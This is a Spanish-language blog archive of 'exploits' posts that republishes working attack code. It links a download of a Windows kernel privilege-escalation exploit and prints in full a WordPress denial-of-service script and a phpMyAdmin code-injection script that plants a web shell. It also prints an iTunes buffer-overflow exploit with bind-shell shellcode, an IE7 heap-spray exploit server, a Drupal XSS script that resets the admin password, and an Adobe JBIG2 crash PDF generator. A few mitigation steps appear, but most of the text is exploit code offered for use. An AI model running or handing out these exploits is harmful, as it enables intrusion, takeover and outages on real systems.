kernelpanic.org.mx

Archivado en ‘exploits’

EXPLOIT [0 day] Para todas las versiones de Microsoft Windows

Publicado por zerialkiller en exploits con 2 Comentarios

Se han publicado los detalles de una grave vulnerabilidad en todas las
versiones de Windows que permite elevar privilegios en el sistema. No
existe parche disponible y el exploit está al alcance de cualquiera,
lo que lo convierte en un serio “0 day” para Microsoft.

Tavis Ormandy, reputado investigador de seguridad que ha encontrado
numerosos fallos de seguridad en diferentes programas, ha publicado
un exploit para una vulnerabilidad que permite elevar privilegios en
Windows. Se trata de un fallo de diseño que arrastran todos los Windows
de 32 bits (basados en tecnología NT) desde 1993. Esto va desde el NT
hasta Windows 7, pasando por 2000, 2003, 2008, XP y Vista.

El fallo reside en el soporte heredado de aplicaciones de 16 bits. No
se valida correctamente el cambio de contexto y pila que se efectúa al
llamar al manejador GP trap. Windows comete algunos errores y asume
incorrectamente que:

* Se requiere el privilegio SeTcbPrivilege para configurar un contexto
VDM (Virtual DOS Machine) .
* Código en ring3 no puede instalar selectores de segmento de código
arbitrarios. Usando el modo Virtual-8086, es posible.
* Código alojado en el ring3 (espacio de usuario) no puede falsificar
un “trap frame”.

Ormandy consigue eludir estas cuestiones, y el resultado es que un
usuario puede realizar un cambio de contexto en el núcleo y ejecutar
código como SYSTEM, el máximo privilegio en el sistema.

Para eludir el tercer punto, se necesita acceder a una dirección de
memoria, que es siempre la misma en todos los Windows menos Vista y
Windows 7 que realizan una “aleatorización” de la carga en memoria. Se
supone que esto protege de este tipo de ataques. Sin embargo, usando
NtQuerySystemInformation(), se puede llegar a calcular dónde está esa
dirección aunque sea diferente en cada inicio, con lo que la protección
ASLR (Address space layout randomization) también se ve eludida.

Ormandy avisó a Microsoft en junio de 2009, y poco después confirmaron
el problema. Harto de que no publicasen una solución (que considera no
muy compleja), ha decidido hacer público el fallo. Él mismo entiende que
esta vulnerabilidad afecta de forma más seria a empresas y corporaciones
que mantienen a sus usuarios con privilegios limitados. Por desgracia,
la mayoría de usuarios caseros utilizan ya la cuenta de administrador
en su Windows (no tan poderosa como SYSTEM, pero equivalente a efectos
prácticos) para tareas cotidianas, con lo que la elevación de
privilegios no suele ser un requisito en los ataques.

El exploit ha sido probado y funciona a la perfección. La buena noticia
es que es relativamente sencillo mitigar el problema. Incluso ha
publicado vídeos en Youtube de cómo hacerlo, destinados principalmente
a administradores. Evitar el fallo implica deshabilitar el soporte para
aplicaciones de 16 bits, que se supone no será ningún problema para la
mayoría de usuarios.

Los pasos son los siguientes:

Desde la consola de políticas (gpedit.msc) abrir “Configuración de
equipo”, “Plantillas administrativas”, “Componentes de Windows”,
“Compatibilidad de aplicación” y habilitar la política “Impedir el
acceso a aplicaciones de 16 bits”. Es importante asegurarse de que
es aplicada a los sistemas que dependen del controlador de dominio,
forzando una actualización de políticas.

Y EN EXCLUSIVA PARA USTEDES EL EXPLOIT

DESCARGAR EXPLOIT

http://lock.cmpxchg8b.com/c0af0967d904cef2ad4db766a00bc6af/KiTrap0D.zip

….el exploit funciona muy bien con en win7

http://gol14th.diosdelared.com/?coment=5255

BackTrack 4 Final Released

Publicado por zerialkiller en exploits, inseguridades, instalar backtrack3, linux con 0 comentarios

Por fin acaban de liberar el backtrack4 aquí les dejo el link de descarga para que todos lo disfrutemos

La mejor de las suertes para todos…

http://www.backtrack-linux.org/downloads/

Nuevo Bug grave en WordPress

Publicado por zerialkiller en exploits con 0 comentarios

El problema radica en el archivo wp-trackbacks.php y permite a cualquier novato, individuo o persona, dejar offline a cualquier blog que use WordPress como CMS, con tan solo 5 minutos y una veintena de consultas, si leyeron bien, solo 20 consultas no se necesitan botnes, redes zombies o supercomputadoras para hacer este tipo de ataque DoS.

Por el momento se ha publicado este exploit, creado en php y que se ejecuta en la consola, pasando por parametro la url del sitio vulnerable, algo asi:

php exploit.php http://blogvulnerable.com

Y aqui esta el codigo del exploit:

<?php
//wordpress Resource exhaustion Exploit
//http://rooibo.wordpress.com/
//security@wordpress.org contacted and get a response,
//but no solution available.
if(count($argv) < 2) {
echo "You need to specify a url to attack\n";
exit;
} $url = $argv[1]; $data = parse_url($url);
if(count($data) < 2) {
echo "The url should have http:// in front of it, and should be complete.\n";
exit;
} if(count($data) == 2) {
$path = '';
} else {
$path = $data['path'];
}
$path = trim($path,'/');
$path .= '/wp-trackback.php';
if($path{0} != '/') {
$path = '/'.$path;
} $b = "";
$b = str_pad($b,140000,'ABCEDFG');
$b = utf8_encode($b);
$charset = "";
$charset = str_pad($charset,140000,"UTF-8,"); $str = 'charset='.urlencode($charset);
$str .= '&url=www.example.com';
$str .= '&title='.$b;
$str .= '&blog_name=lol';
$str .= '&excerpt=lol'; $count = 0;
while(1) {
$fp = @fsockopen($data['host'],80);
if(!$fp) {
if($count > 0) {
echo "down!!!!\n";
exit;
}
echo "unable to connect to: ".$data['host']."\n";
exit;
} fputs($fp, "POST $path HTTP/1.1\r\n");
fputs($fp, "Host: ".$data['host']."\r\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($fp, "Content-length: ".strlen($str)."\r\n");
fputs($fp, "Connection: close\r\n\r\n");
fputs($fp, $str."\r\n\r\n"); echo "hit!\n";
$count++;
} ?>

Todavia no existe parche para reparar el bug, la unica solucion conocida hasta el momento, es la que se manifiesta en el enlace donde nos cuentan el parche:

Editar el archivo wp-trackbacks.php y buscar esta linea:

$charset = $_POST['charset'];

y cambiarla por esta:

$charset = str_replace(”,”,””,$_POST['charset']);
if(is_array($charset)) { exit; }

Para mas informacion pueden visitar este enlace, en el cual explican mucho mas a fondo en que consiste el bug, asi pues, todos a corregir nuestro wordpress, para asi evitar futuros dolores de cabeza.

Gracias a : inconinformatico.net por compartir la Noticia

phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit

Publicado por zerialkiller en exploits con 5 Comentarios

#!/bin/bash

# CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11
# by pagvac (gnucitizen.org), 4th June 2009.
# special thanks to Greg Ose (labs.neohapsis.com) for discovering such a cool vuln,
# and to str0ke (milw0rm.com) for testing this PoC script and providing feedback!

# PoC script successfully tested on the following targets:
# phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1
# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)

# attack requirements:
# 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5
# and 3.x before 3.1.3.1 according to PMASA-2009-3
# 2) it *seems* this vuln can only be exploited against environments
# where the administrator has chosen to install phpMyAdmin following
# the *wizard* method, rather than manual method: http://snipurl.com/jhjxx
# 3) administrator must have NOT deleted the '/config/' directory
# within the '/phpMyAdmin/' directory. this is because this directory is
# where '/scripts/setup.php' tries to create 'config.inc.php' which is where
# our evil PHP code is injected 
# more info on:
# http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
# http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/

if [[ $# -ne 1 ]]
then
	echo "usage: ./$(basename $0) <phpMyAdmin_base_URL>"
	echo "i.e.: ./$(basename $0) http://target.tld/phpMyAdmin/"
	exit
fi

if ! which curl >/dev/null
then
	echo "sorry but you need curl for this script to work!"
       	echo "on Debian/Ubuntu: sudo apt-get install curl"
       	exit
fi

function exploit {

postdata="token=$1&action=save&configuration="\
"a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22host%27]="\
"%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:"\
"%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:"\
"%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:"\
"%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"

postdata2="token=$1&action=save&configuration=a:1:"\
"{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d="\
"%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3b"\
"system(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}"\
"if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval"\
"(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//"\
"%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22"\
"mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:"\
"%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config"\
"%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"

	flag="/tmp/$(basename $0).$RANDOM.phpinfo.flag.html"

	echo "[+] attempting to inject phpinfo() ..."
	curl -ks -b $2 -d "$postdata" --url "$3/scripts/setup.php" >/dev/null

	if curl -ks --url "$3/config/config.inc.php" | grep "phpinfo()" >/dev/null
	then
		curl -ks --url "$3/config/config.inc.php" >$flag
		echo "[+] success! phpinfo() injected successfully! output saved on $flag"
		curl -ks -b $2 -d $postdata2 --url "$3/scripts/setup.php" >/dev/null
		echo "[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:"
		echo "    $3/config/config.inc.php?c=ls+-l+/"
		echo "    $3/config/config.inc.php?p=phpinfo();"
		echo "    please send any feedback/improvements for this script to"\
		"unknown.pentester<AT_sign__here>gmail.com"
	else
		echo "[+] no luck injecting to $3/config/config.inc.php  "
		exit
	fi
}
# end of exploit function

cookiejar="/tmp/$(basename $0).$RANDOM.txt"
token=`curl -ks -c $cookiejar --url "$1/scripts/setup.php" | grep \"token\" | head -n 1 | cut -d \" -f 12`
echo "[+] checking if phpMyAdmin exists on URL provided ..."

#if grep phpMyAdmin $cookiejar 2>/dev/null > /dev/null
if grep phpMyAdmin $cookiejar &>/dev/null
then
	length=`echo -n $token | wc -c`

	# valid form token obtained?
	if [[ $length -eq 32 ]]
	then
		echo "[+] phpMyAdmin cookie and form token received successfully. Good!"
		# attempt exploit!
		exploit $token $cookiejar $1
	else
		echo "[+] could not grab form token. you might want to try exploiting the vuln manually  "
		exit
	fi
else
	echo "[+] phpMyAdmin NOT found! phpMyAdmin base URL incorrectly typed? wrong case-sensitivity?"
	exit
fi

Apple iTunes 8.1.1.10 (itms/itcp) Remote Buffer Overflow Exploit (win)

Publicado por zerialkiller en exploits con 0 comentarios

#!/usr/bin/python
# Apple iTunes 8.1.1.10 itms/itcp BOF Windows Exploit
# www.offensive-security.com/blog/vulndev/itunes-exploitation-case-study/
# Matteo Memelli | ryujin __A-T__ offensive-security.com
# Spaghetti & Pwnsauce - 06/10/2009
# CVE-2009-0950 http://dvlabs.tippingpoint.com/advisory/TPTI-09-03
#
# Vulnerability can't be exploited simply overwriting a return address on the
# stack because of stack  canary protection. Increasing buffer  size leads to
# SEH overwrite but it seems that the Access Violation needed to get  our own
# Exception Handler called is not always thrown.
# So, to increase reliability, the exploit sends two URI to iTunes:
# - the 1st payload corrupts the stack (it doesnt overwrite cookie, no crash)
# - the 2nd payload fully overwrite SEH to 0wN EIP
# Payloads must be encoded in order to obtain pure ASCII printable shellcode.
# I could trigger the  vulnerability from  Firefox but not from IE that seems
# to truncate the long URI.
# Tested on Windows XP SP2/SP3 English, Firefox 3.0.10,
# iTunes 8.1.1.10, 8.1.0.52
#
# --> hola hola ziplock, my Apple Guru!   && cheers to muts... he knows why
#
# ryujin:Desktop ryujin$ ./ipwn.py
# [+] iTunes 8.1.10 URI Bof Exploit Windows Version CVE-2009-0950
# [+] Matteo Memelli aka ryujin __A-T__ offensive-security.com
# [+] www.offensive-security.com
# [+] Spaghetti & Pwnsauce
# [+] Listening on port 80
# [+] Connection accepted from: 172.16.30.7
# [+] Payload sent, wait 20 secs for iTunes error!
# ryujin:Desktop ryujin$ nc -v 172.16.30.7 4444
# Connection to 172.16.30.7 4444 port [tcp/krb524] succeeded!
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Mozilla Firefox>

from socket import *

html = """
<html>
  <head><title>iTunes loading . . .</title>
  <script>
   function openiTunes(){document.location.assign("itms://itunes.apple.com/");}
   function prepareStack(){document.location.assign("%s");}
   function ownSeh(){document.location.assign("%s");}
   function ipwn(){
    prepareStack();
    ownSeh();
   }
   function main() {
    openiTunes();
    // Increase this timeout if your iTunes takes more time to load!
    setTimeout('ipwn()',20000);
   }
  </script>
  </head>
  <body onload="main();">
    <p align="center">
    <b>iTunes 8.1.1.10 URI Bof Exploit Windows Version CVE-2009-0950</b>
    </p>
    <p align="center"><b>ryujin __ A-T __ offensive-security.com</b></p>
    <p align="center"><b>www.offensive-security.com</b></p>
    <p align="center">
    iTunes starting... wait for 20 secs; if you get an error, click "Ok"
    in the MessageBox before checking for your shell on port 4444  <br/>
    If victim host is not connected to the internet, exploit will fail
    unless iTunes is already opened and you disable "openiTunes" javascript
    function.
    <br/>
    <h2 align="center">
    <b><u>This exploit works if opened from Firefox not from IE!</u></b>
    </h2>
    <p align="center">
    After exploitation iTunes crashes, you need to kill it from TaskManager
    <br/>have fun!</br>
    </p>
    </p>
  </body>
</html>"""

# Alpha2 ASCII  printable  Shellcode  730 Bytes, via  EDX (0x60,0x40 Badchar)
# This is not standard Alpha2 bind shell. Beginning of shellcode  is modified
# in order to obtain register alignment and to  reset ESP and EBP we  mangled
# before. Rest of decoded shellcode is Metasploit  bind  shell  on  port 4444
# EXITFUNC=thread
#
shellcode = ("VVVVVVVVVVVVVVVVV7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIOqhDahIoS0"
             "5QnaJLS1uQVaeQcdcm2ePESuW5susuPEsuilazJKRmixHykOkOKOCPLKPlUtu"
             "tnkRegLLKSLfepx31zOlK2o7hlKqOEpWqZK3ylKwDLKeQHndqo0j9llOt9P3D"
             "uW9Q8J4MWqkrJKkDukPTWTq845M5LKQOq4VajKcVLKTLPKlKQOUL6ajK336LL"
             "KMY0lWTwle1O3TqiK2DLKaSFPLKQPVllK0p7lLmlK3pUXQNU8LNbnvnjL0PkO"
             "8V2Fv3U61xds02U8RWpsVRqO649on0PhjkZMYlekpPKOKfsoMYkUpfna8mgxV"
             "b65RJuRIoHPPhHYFiL5lmBwkOzvpSPSV3F3bsg3BsSsScIohPsVRHR1sl2Fcc"
             "k9M1nuphOT6zppIWrwKO8VcZ6ppQv5KO8PBHmtNMvNm9QGKON6aCqEkOZpbHZ"
             "EbiNfRiSgioiFRpf40TseiohPLSu8KWD9kvPyf7YoxVqEKOxPu6sZpd3VSX1s"
             "0mK98ecZRpv9Q9ZlMYkWqzpDmYxbTqO0KCoZKNaRVMkN3r6LJ3NmpzFXNKNKL"
             "ksX0rkNls5FkOrURdioXVSk67PRPQsapQCZgqbq0QSesaKOxPaxNMZyEUjnCc"
             "KOn6qzKOkOtwKOJpNk67YlMSKtcTyozvrryozp0hXoZnYp1p0SkOXVKOHPA")
# Padding
pad0x1          = "\x41"*425

# Make EDX pointing to shellcode and "pray" sh3llcod3 M@cumBa w00t w00t
align           = "\x61"*45 + "\x54\x5A" + "\x42"*6 + "V"*10

# Padding
pad0x2          = "\x41"*570

# ASCII friendly RET overwriting SEH: bye bye canary, tweet tweet
# 0x67215e2a QuickTime.qts ADD ESP,8;RETN (SafeSEH bypass)
ret             = "\x2a\x5e\x21\x67"

# Let the dance begin... Point EBP to encoded jmp
align_for_jmp   = "\x61\x45\x45\x45" + ret + "\x44" + "\x45"*7

# Decode a NEAR JMP and JUMP BACK BABY!
jmp_back        = ("UYCCCCCCIIIIIIIIII7QZjAXP0A0AkA"
                   "AQ2AB2BB0BBABXP8ABuJIZIE5jZKOKOA")
# Padding
pad0x3          = "\x43"*162

# We send 2 payloads to iTunes: first is itms and second itpc
# url1 smashes the stack in order to get an AV later
url1            = "itms://:" + "\x41"*200 + "/"
url2            = "itpc://:" + pad0x1 + align + shellcode +pad0x2 +\
                               align_for_jmp + jmp_back + pad0x3
payload         = html % (url1, url2)

print "[+] iTunes 8.1.1.10 URI Bof Exploit Windows Version CVE-2009-0950"
print "[+] Matteo Memelli aka ryujin __A-T__ offensive-security.com"
print "[+] www.offensive-security.com"
print "[+] Spaghetti & Pwnsauce"
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 80))
s.listen(1)
print "[+] Listening on port 80"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.recv(1024)
c.send(payload)
print "[+] Payload sent, wait 20 secs for iTunes error!"
c.close()
s.close()

MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) (fast)

Publicado por zerialkiller en exploits con 0 comentarios

#
#   Author : Ahmed Obied (ahmed.obied@gmail.com)
#
#   - Based on the code found by str0ke in the wild for MS09-002
#   - Tested using Internet Explorer 7.0.5730.11 on Windows XP SP2
#
#   Usage  : python ie_ms09002.py [port]
#

import sys, socket
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler

class RequestHandler(BaseHTTPRequestHandler):

    def get_payload(self):
        # win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub
        # http://metasploit.com
        payload  = '\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6f'
        payload += '\x02\xb1\x0e\x83\xeb\xfc\xe2\xf4\x93\xea\xf5\x0e\x6f\x02\x3a\x4b'
        payload += '\x53\x89\xcd\x0b\x17\x03\x5e\x85\x20\x1a\x3a\x51\x4f\x03\x5a\x47'
        payload += '\xe4\x36\x3a\x0f\x81\x33\x71\x97\xc3\x86\x71\x7a\x68\xc3\x7b\x03'
        payload += '\x6e\xc0\x5a\xfa\x54\x56\x95\x0a\x1a\xe7\x3a\x51\x4b\x03\x5a\x68'
        payload += '\xe4\x0e\xfa\x85\x30\x1e\xb0\xe5\xe4\x1e\x3a\x0f\x84\x8b\xed\x2a'
        payload += '\x6b\xc1\x80\xce\x0b\x89\xf1\x3e\xea\xc2\xc9\x02\xe4\x42\xbd\x85'
        payload += '\x1f\x1e\x1c\x85\x07\x0a\x5a\x07\xe4\x82\x01\x0e\x6f\x02\x3a\x66'
        payload += '\x53\x5d\x80\xf8\x0f\x54\x38\xf6\xec\xc2\xca\x5e\x07\x7c\x69\xec'
        payload += '\x1c\x6a\x29\xf0\xe5\x0c\xe6\xf1\x88\x61\xd0\x62\x0c\x2c\xd4\x76'
        payload += '\x0a\x02\xb1\x0e';
        return self.convert_to_utf16(payload)

    def get_exploit(self):
        exploit = '''

        function spray_heap()
        {
            var payload = unescape("<PAYLOAD>");

            var ret = 0x0c0c0c0c;
            var heap_chunk_size = 0x40000;

            var nopsled_size = heap_chunk_size - (payload.length * 2)
            var nopsled = unescape("%u0c0c%u0c0c");
            while (nopsled.length < nopsled_size)
                nopsled += nopsled;

            heap_chunks = new Array();
            heap_chunks_num = (ret - heap_chunk_size)/heap_chunk_size;
            for (var i = 0 ; i < heap_chunks_num ; i++)
                heap_chunks[i] = nopsled + payload;
        }

        function trigger_bug()
        {
            var obj = document.createElement("table");
            obj.click;

            var obj_cp = obj.cloneNode();
            obj.clearAttributes();
            obj = null;

            CollectGarbage();

            var img = document.createElement("img");
            img.src = unescape("%u0c0c%u0c0cCCCCCCCCCCCCCCCCCCCCCC");

	        obj_cp.click;
        }

        if (navigator.userAgent.indexOf("MSIE 7") != -1) {
            spray_heap();
            trigger_bug()
        } else
            window.location = "about:blank"

        '''
        exploit = exploit.replace('<PAYLOAD>', self.get_payload())
        exploit = '<html><body><script>' + exploit + '</script></body></html>'
        return exploit

    def convert_to_utf16(self, payload):
        # From Beta v2.0 by Berend-Jan Wever
        # http://www.milw0rm.com/exploits/656
        enc_payload = ''
        for i in range(0, len(payload), 2):
            num = 0
            for j in range(0, 2):
                num += (ord(payload[i+j]) & 0xff) << (j*8)
            enc_payload += '%%u%04x' % num
        return enc_payload

    def log_request(self, *args, **kwargs):
        pass

    def do_GET(self):
        print '[-] Incoming connection from %s' % self.client_address[0]
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()
        print '[-] Sending exploit to %s ...' % self.client_address[0],
        self.wfile.write(self.get_exploit())
        print 'done'

def main():
    if len(sys.argv) != 2:
        print 'Usage: %s [port]' % sys.argv[0]
        sys.exit(1)
    port = None
    try:
        port = int(sys.argv[1])
        if port < 1 or port > 65535:
            raise ValueError
    except ValueError:
        print '[*] ERROR: invalid port number ...'
        sys.exit(-1)
    try:
        serv = HTTPServer(('', port), RequestHandler)
        ip = socket.gethostbyname(socket.gethostname())
        print '[-] Web server is running at http://%s:%d/' % (ip, port)
    except socket.error:
        print '[*] ERROR: a socket error has occurred ...'
        sys.exit(-1)
    try:
        serv.serve_forever()
    except KeyboardInterrupt:
        print '[-] Exiting ...'

if __name__ == '__main__':
    main()

# milw0rm.com [2009-03-04]

drupal-passwdxss.txt

Publicado por zerialkiller en exploits con 0 comentarios

Small write up regarding a cross site scripting vulnerability on Drupal version 5.15 being used for a password change attack. Attack script included.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Problem Description:

There have been quite a few Cross Site Scripting (XSS) vulnerabilities
discovered in Drupal modules recently.  Many people scoff at XSS and
even argue that it's a low threat vulnerability.  In many cases this is
certainly true, however XSS can be used as an element in an attack that
leverages other security weaknesses to devastating consequence.  A case
in point is the password changing option in Drupal.  Drupal does a
wonderful job in preventing against Cross Site Request Forgery (XSRF or
CSRF) by placing tokens in forms to validate posts.  Drupal provides a
token in the id "edit-user-edit-form-token" in the edit user form (found
at ?a=user/X/edit where X is the user id number).  A sample value
contained in this hidden form field is
"5545a410de3662f1844af7ee6f1ee770" - a value sufficiently long and
random that an attacker would have great difficulty in guessing the
value.  However, the Drupal account page doesn't require users to enter
the current account password in order to change the password to a new
value.  This flaw, combined with a well crafted XSS attack, could be
used to change a user's password to an arbitrary value.  What's worse,
Drupal uses session cookies by default that can keep users logged into
the site for days.  This means that a user could be the victim of a
password changing attack and not even realize their password had been
changed for some time (until their session cookie timed out or they
logged out of the site) when they were forced to log back in to the
site.  The user would still be able to request a password reset via
e-mail, so they would not be locked out of the site, but they might have
their account hijacked for some time in the interim.

Exploiting the Flaw:

To accomplish a malicious password change via XSS is quite easy.  The
technique can use an invisible iframe that loads the account editing
page.  This is similar to a cross site request forgery, except that by
embedding the iframe in the target site the request does not even have
to cross domains.  The iframe loads the target page, which includes the
Drupal generated token.  The malicious script can then fill in a new
password and submit the form, invisibly to the user.

I have provided an example of such a script below.  Note that this
script is enhanced in that it will only change the user's password if
the user has a user id of 1, or is the administrative super user.  I've
also left out the logic to alert a remote attacker of a successful
compromise, but this is a simple feature to add.  Once added to any
page, this script will silently assess the user id of any logged in
Drupal user who requests the page.  If the user is the site admin then
their password will be reset to "password" silently, without their
knowledge.

Why the Attack Works:

This attack is possible because Drupal does not require
re-authentication in order to perform a password reset.  Because the
malicious JavaScript writer doesn't have to provide an unknown password,
there is no barrier to the update.  In order to prevent against this
sort of attack Drupal would have to add another field in the password
changing (user edit) screen where users were required to enter their
existing password.

Using the Attack:

The JavaScript snippet below could be injected in any number of ways
into a site.  In fact, many Drupal sites are configured so any content
creator can use the "Full HTML" input format, which is all that is
required to insert JavaScript into Drupal site content.  Any users with
this ability or attackers who compromised such an account, would be able
to attack and compromise the Drupal super user account using this method.

Notes:

Note that in the script below the Drupal site is running at 192.168.0.2
and the URL settings are such that the admin user edit screen is
available at http://192.168.0.2/?q=user/1/edit.  Note that this script
could be altered to update the password of any Drupal user account, not
necessarily just the administrator as it checks the "My account" link
URL to determine the user id of the logged in user viewing the malicious
Drupal content.

This script was tested against Drupal 5.15 on Mozilla Firefox.  Some
modification may be necessary for other versions of Drupal, although
Drupal 6 seems vulnerable as well.  Other browsers may require separate
JavaScript syntax to carry out this attack.

Attack Script:

<script>
function alterUser() {
  var text = document.documentElement.innerHTML;
  var myAccountText = text.indexOf('My account');
  var i = myAccountText-2;
  while (! text.charAt(i).match(/[0-9]/g)) {
    i--;
  }
  myAccountNumber = text.substring(i, myAccountText-2);
  if (myAccountNumber == 1) {
    /*alert(myAccountNumber );*/
    var url = "http://192.168.0.2/?q=user/" + myAccountNumber + "/edit";
    document.write('<iframe id="foo" name="foo" width="1" height="1" >');
    document.write('</iframe>');
    window.frames['foo'].location = url;
    /* Slow it down, let the load happen */
    setTimeout('doNext()', 4000);
   }
}
function doNext() {
    var theDoc = document.getElementById('foo');
    foo.document.getElementById('edit-pass-pass1').value = 'password';
    foo.document.getElementById('edit-pass-pass2').value = 'password';
    foo.document.getElementById('user-edit').submit();
    /* Admin pass changed - TODO: alert evil overlords */
}
alterUser();
</script>

Follow Up:

The Drupal security team has been notified about this issue.  It seems a
mitigation feature may be built into Drupal 7
(http://drupal.org/node/86299, http://drupal.org/node/138805) and a
verify password on change patch does exist (http://drupal.org/node/86711).

The text of this advisory is also available at

http://lampsecurity.org/drupal-xss-password-reset

- --
Justin C. Klein Keane

http://www.MadIrish.net

http://www.LAMPSecurity.org

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iQD1AwUBSbBC65EpbGy7DdYAAQJDCAcArCksNxWe1Wu0xGR/fK2xzAxStfqZnfkg
3r4SrvlFFT2YOJrlAeSFI7ALNKHCyluW8iKPbYEHDTD9KsbdhNC6ZJ10xiKP9D3X
2xh9AibJuj7CTOacVXJfyNcYxngsArzmnUo44qZOl+dch7JG1adSD2fVntcDh1F4
+W3qH+QE8Q5OzdVrachzdAZytv9LLHv907xfSWo40IERFpt6Xr1HmM16Y7XYuwcA
rbEvWGmNgkPUMrcQ2mfIN2/vRnReeJ/693sfhnEd8nXUPUbPO3EcFTakx+Tfq98n
/G+wfW+MJYQ=
=IMPE
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[ highlighted ]

Publicado por zerialkiller en exploits con 0 comentarios

Adobe Acrobat Reader JBIG2 Local Buffer Overflow PoC #2 0day && MS Internet Explorer 7 Memory Corruption PoC (MS09-002)

#!/usr/bin/perl
# k`sOSe 02/22/2009

# http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html

my $size = "\x40\x00";
my $factor = "ABCD";
my $data = "A" x 8314;

print pdf();

sub pdf()
{

"%PDF-1.5\n" .
"%\xec\xf5\xf2\xe1\xe4\xef\xe3\xf5\xed\xe5\xee\xf4\n" .
"3 0      \n" .
"xref\n" .
"3 16\n" .
"0000000023 00000 n \n" .
"0000000584 00000 n \n" .
"0000000865 00000 n \n" .
"0000001035 00000 n \n" .
"0000001158 00000 n \n" .
"0000001287 00000 n \n" .
"0000001338 00000 n \n" .
"0000001384 00000 n \n" .
"0000002861 00000 n \n" .
"0000003637 00000 n \n"  .
"0000005126 00000 n \n" .
"0000005173 00000 n \n" .
"0000005317 00000 n \n" .
"0000005370 00000 n \n" .
"0000005504 00000 n \n" .
"0000000714 00000 n \n" .
"trailer\n" .
"<</Root 4 0 R/Info 2 0 R/ID[<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>]/Size 19/Prev 10218>>\n" .
"startxref\n" .
"0\n" .
"%%EOF\n" .
"   \n" .
"4 0 obj\n" .
"<</Type/Catalog/Pages 1 0 R/OCProperties<</OCGs[9 0 R 13 0 R]/D<</Order[9 0 R 13 0 R]/ON[9 0 R 13 0 R]/OFF[]>>>>>>\n" .
"endobj\n" .
"         \n" .
"5 0 obj\n" .
"<</Type/Page/MediaBox[0 0 640 480]/Resources<</XObject<</Im001 7 0 R/Im002 10 0 R/Im003 11 0 R/Im004 14 0 R/Im005 16 0 R>>>>/Contents 6 0 R/Parent 1 0 R>>\n" .
"endobj\n" .
"6 0 obj\n" .
"<</Length 56/Filter/FlateDecode>>\n" .
"stream\n" .
"x\x9c\xe3*T031P\x00A\x13\x0b\x08\x9d\x9c\xab\xa0\xef\x99k``\xa8\xe0\x92\xaf\x10\xc8\x85[\x81\x11!\x05\xc6\x84\x14\x98\xc0\x14\xc0\$\@\xb4\x05\xb2\n" .
"S\xb0\n" .
"\x00J\x15#,\n" .
"endstream\n" .
"endobj\n" .

"12 0 obj\n" .
"<</Subtype/Image/Width 640/Height 480/ColorSpace/DeviceGray/BitsPerComponent 1/Decode[1 0]/Interpolate true/Length 1314/Filter/JBIG2Decode>>\n" .
"stream\n" .
"\x00\x00\x00\x01" . $size . $factor . "\x13" . $data . "endstream\n" .
"endobj\n" .
"13 0 obj\n" .
"<</Type/OCG/Name(Text Color)>>\n" .
"endobj\n" .
"14 0 obj\n" .
"<</Subtype/Image/Width 1/Height 1/ColorSpace/DeviceGray/BitsPerComponent 8/SMask 12 0 R/OC 15 0 R/Length 1>>\n" .
"stream\n" .
"\x00\n" .
"endstream\n" .
"endobj\n" .

"1 0 obj\n" .
"<</Type/Pages/Kids[5 0 R]/Count 1>>\n" .
"endobj\n" .
"xref\n" .
"0 3\n" .
"0000000000 65535 f \n" .
"0000009988 00000 n \n" .
"0000010039 00000 n \n" .
"trailer\n" .
"<</ID[<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>]/Size 3>>\n" .
"startxref\n" .
"104\n" .
"%%EOF\n";

}

# milw0rm.com [2009-02-23]

----------------------------------------------------------------------------------------------

MS Internet Explorer 7 Memory Corruption PoC (MS09-002)

<!--
MS09-002
===============================
grabbed from:
